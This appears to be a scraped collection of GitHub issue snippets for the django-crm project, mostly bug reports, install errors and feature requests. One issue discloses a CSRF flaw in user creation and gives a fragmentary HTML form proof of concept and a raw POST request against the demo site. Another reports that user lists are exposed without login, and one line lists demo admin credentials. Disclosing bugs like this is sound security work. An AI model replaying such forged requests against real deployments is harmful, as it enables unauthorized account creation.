micropyramid / django-crm Goto Github PK

• Messages should be meaningful
• Messages should be in red color
• mandatory fields should be marked with red asterisk symbol

Hello, I am get source Django-CRM. Start server by "python manage.py runserver", open login page to CRM , but I dont know how to add my account data in to. Can you tell me how to add account date to the CRM?

There is already a quite far developed django based crm.
I would appreciate when we could start to work together on the same project.
Let us discuss by email [email protected]

For example USer creation form has no csrf token validation, so that attacker can create own account by sending malicious link

POC :

<tr><td>last_name</td><td><input type="text" value="abuthahir++" name="last_name"></td></tr>
<tr><td>username</td><td><input type="text" value="abu" name="username"></td></tr>
<tr><td>email</td><td><input type="text" value="[email protected]" name="email"></td></tr>
<tr><td>role</td><td><input type="text" value="" name="role"></td></tr>
<tr><td>password</td><td><input type="text" value="reset!23" name="password"></td></tr>
</table><input type="submit" value="http://django-crm.micropyramid.com/users/create/"></form></html>```




EXPLOIT REQUEST:

POST /users/create/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/create/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Cookie: sessionid=g8up9d4xvqga5rwk1m7f4e4mhxmy111
Connection: close
Upgrade-Insecure-Requests: 1

first_name=syed&last_name=abuthahir++&username=abu&email=test%40gmail.com&role=&password=reset%2123

• installation
• development process
• release process

You have a security issue, the crm list users without the need for a login

canceling the edit profil ( https://django-crm.micropyramid.com/users/1/edit/ ) return 404 , i don't get it why ?!! the save too

• Login
• Forgot Password

You have the email and planner apps commented out in the main crm/urls.py. Is this intentional as you are still developing this CRM? Are you planning to add documentation on how to enable these features at http://django-crm.readthedocs.io ? These features/documentation would be very helpful!

# url(r'^emails/', include('emails.urls', namespace='emails')),
# url(r'^planner/', include('planner.urls', namespace='planner')),

admins not able to change password. Change password page should ask user to enter current password, new password, confirm password details.

Search should be done with single character too

There is no need of the labels for address like city, state. Just display the address with the given details in a single line seperated by comma

Dont Display comment box if user dont have permission to create comment for the account in account view page

When we enter which is not there in the database, it should return User with email id not exists error message

• amazon ses
• sendgrid
• mailgun
• mandrill

Show open closed leads, accounts, contacts, campaigns

Now the page is redirecting to profile page

trying to start your crm but gets into problems

Exception Type: FilterError
Exception Value: /bin/sh: 1: sass: not found

I am wondering if there is a dependicy missing?

Now Admins can able to change user email address. Email address should not be editable.

Credentials to CRM Dashboard:

    Email: [email protected]
    Password: admin

Not working on https://django-crm.micropyramid.com/login/?next=/

Add Custom 404 & 500 pages.

In leads list page

• create invoice and save it or keep it as draft
• send invoice to client
• add partial payments
• list all invoices
• birds eye view dashboard

Pagination design broken

Fix it in the following list pages.

1. Users
2. Cases
3. Contacts
4. Leads
5. Opportunities
6. Cases

"P" should be capital in the "Forgot Password" text

in all update pages we are getting text as "create" in the bread crumb

Now user can able to create duplicate contacts. Those should be unique.

Getting error as "403 Forbidden"

The name "oppurtunity" should be changed to "opportunity", throughout the project

But now the page is redirecting to list page

Unable to apply CachedCompilerFilter (sass --scss {infile} {outfile})
Could not find an option named "scss".

Usage: sass [output]

COMPRESS_PRECOMPILERS = (
('text/less', 'lessc {infile} {outfile}'),
('text/x-sass', 'sass {infile} {outfile}'),
('text/x-scss', 'sass --scss {infile} {outfile}'),
)

I removed the -css on settings and work.
What is wrong?

• and add badges to README
• add docker release info to wiki

After creating a superuser and logging in, I do not see the tab with 'Users'.
Any idea?